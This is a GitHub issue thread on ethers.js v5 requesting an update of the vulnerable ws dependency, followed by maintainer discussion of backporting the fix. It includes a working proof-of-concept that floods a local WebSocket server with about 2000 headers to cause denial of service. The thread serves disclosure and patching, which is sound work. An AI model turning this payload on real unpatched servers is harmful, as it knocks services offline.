search

ethers-io / ethers.js

Complete Ethereum library and wallet implementation in JavaScript.
https://ethers.org/
MIT License
7.87k stars 1.82k forks source link

Fix DoS vulnerability caused by `ws` dependency on v5 #4791

Open cgero-eth opened 1 month ago

cgero-eth commented 1 month ago

Ethers Version

5.7.2

Search Terms

ws, vulnerability, DoS, v5

Describe the Problem

Ethers.js v5.7.2 depends on a vulnerable version of the ws package. The vulnerability allows DoS attack. The ws package must be updated to version >= 8.17.1 to fix the vulnerability.

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

Code Snippet

From Dependabot:

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Contract ABI

N/A

Errors

N/A

Environment

Ethereum (mainnet/ropsten/rinkeby/goerli), Altcoin - Please specify (e.g. Polygon), node.js (v12 or newer), Browser (Chrome, Safari, etc)

Environment (Other)

No response

ricmoo commented 1 month ago

Thanks for the snippet.

This was addressed when the exploit was announced in v6, but it certainly makes sense to port back into v5 as it is still widely used.

netzulo commented 3 weeks ago

lol, just a merge need it on v5 ? please, resolve this, easy to close :D

ricmoo commented 3 weeks ago

It’s not really “easy to close”… The v5 branch is 2.5 years old; I’ve spent the last week carefully updating the tests (migrating from Goerli to Sepolia, redeploying contracts, etc), deployment scripts and other dev dependencies though and it is almost ready with the updated ws package. :)

It still has 650k downloads per week though, so important not to bork and make sure the change is well tested. :)

airdropross commented 2 days ago

Hey @ricmoo any status update here? We are also trying to patch this vulnerability in our codebase and would love to continue using your incredible ethers library!